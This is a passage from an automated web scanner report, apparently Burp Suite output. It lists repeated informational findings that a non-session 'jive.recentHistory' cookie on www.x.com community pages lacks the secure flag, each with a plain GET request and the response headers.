Set-Cookie: jive.recentHistory.-1=31342c323034303b31342c323133313b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=100595 t=1313157070639699
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.27. https://www.x.com/community/ppx/global/cn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/cn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/cn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133313b31342c323030343b31342c323033393b31342c323034303b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=70307 t=1313157070898066
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.28. https://www.x.com/community/ppx/global/de

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/de

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/de HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034323b31342c323133313b31342c323034313b31342c323034303b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:12 GMT; Path=/
Vary: User-Agent
JP: D=91052 t=1313157072186357
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.29. https://www.x.com/community/ppx/global/fr

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/fr

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/fr HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034313b31342c323034303b31342c323033393b31342c323133313b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:11 GMT; Path=/
Vary: User-Agent
JP: D=90705 t=1313157071522380
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.30. https://www.x.com/community/ppx/global/it

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/it

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/it HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034333b31342c323133303b31342c323034323b31342c323030343b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=83031 t=1313157073107237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.31. https://www.x.com/community/ppx/global/jp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/jp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/jp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133303b31342c323034323b31342c323034313b31342c323034333b31342c323030343b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=64298 t=1313157073255195
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.32. https://www.x.com/community/ppx/global/mx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/mx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/mx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034343b31342c323133303b31342c323030343b31342c323034323b31342c323034333b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=84686 t=1313157074147841
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.33. https://www.x.com/community/ppx/global/nl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/nl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/nl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323034333b31342c323133303b31342c323034343b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b31342c323033393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=74016 t=1313157074525656
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.34. https://www.x.com/community/ppx/global/sp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/sp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/sp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=120118 t=1313157075242154
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.35. https://www.x.com/community/ppx/global/uk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/uk

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/uk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034373b31342c323034343b31342c323034363b31342c323034353b31342c323034333b31342c323133303b31342c323030343b31342c323034323b31342c323034313b31342c323034303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:15 GMT; Path=/
Vary: User-Agent
JP: D=132311 t=1313157075777765
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.36. https://www.x.com/community/ppx/ipn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ipn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ipn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032383b31342c323032363b31342c323032373b31342c323032303b31342c323031383b31342c323036333b31342c323031373b31342c323030363b31342c323031363b31342c323234363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=93490 t=1313157061548233
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.37. https://www.x.com/community/ppx/marketplaces

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/marketplaces

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/marketplaces HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134323b31342c323134353b31342c323134333b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=108959 t=1313157078551586
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.38. https://www.x.com/community/ppx/mass_pay

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/mass_pay

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/mass_pay HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031313b31342c323030393b31342c323030373b31342c323030333b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:34 GMT; Path=/
Vary: User-Agent
JP: D=98932 t=1313157034722623
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.39. https://www.x.com/community/ppx/offlineanddevices

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/offlineanddevices

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/offlineanddevices HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134363b31342c323134323b31342c323030353b31342c323134333b31342c323134353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=113532 t=1313157078857855
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.40. https://www.x.com/community/ppx/p2p

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/p2p

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/p2p HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134343b31342c323134323b31342c323134333b31342c323134353b31342c323134363b31342c323030353b31342c323034373b31342c323034363b31342c323034353b31342c323034343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:19 GMT; Path=/
Vary: User-Agent
JP: D=81213 t=1313157079302842
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.41. https://www.x.com/community/ppx/payflow_link

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_link

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_link HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031333b31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:56 GMT; Path=/
Vary: User-Agent
JP: D=81349 t=1313157056540618
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.42. https://www.x.com/community/ppx/payflow_pro

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_pro

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_pro HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031343b31342c323030393b31342c323030383b31342c323031303b31342c323031393b31342c323237363b31342c323237303b31342c323030353b31342c323030373b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:33 GMT; Path=/
Vary: User-Agent
JP: D=271432 t=1313157033322018
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.43. https://www.x.com/community/ppx/payflow_xml_reporting

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/payflow_xml_reporting

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/payflow_xml_reporting HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032373b31342c323032303b31342c323032363b31342c323031383b31342c323031373b31342c323036333b31342c323030363b31342c323031363b31342c323234363b31342c323031353b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:01 GMT; Path=/
Vary: User-Agent
JP: D=106498 t=1313157060903457
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.44. https://www.x.com/community/ppx/pdt

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/pdt

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/pdt HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032393b31342c323033303b31342c323032303b31342c323032373b31342c323032383b31342c323036333b31342c323032363b31342c323031383b31342c323031373b31342c323030363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=122974 t=1313157061920177
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.45. https://www.x.com/community/ppx/permissions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/permissions

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/permissions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032303b31342c323032363b31342c323031363b31342c323031373b31342c323030363b31342c323031383b31342c323036333b31342c323234363b31342c323031353b31342c323031333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:00 GMT; Path=/
Vary: User-Agent
JP: D=124196 t=1313157059978751
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.46. https://www.x.com/community/ppx/press

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/press

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/press HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134393b31342c323038323b31342c323030353b31342c323134363b31342c323134343b31342c323038363b31342c323134323b31342c323134333b31342c323134353b31342c323034373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=85690 t=1313157080601110
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.47. https://www.x.com/community/ppx/recurring_billing

Summary

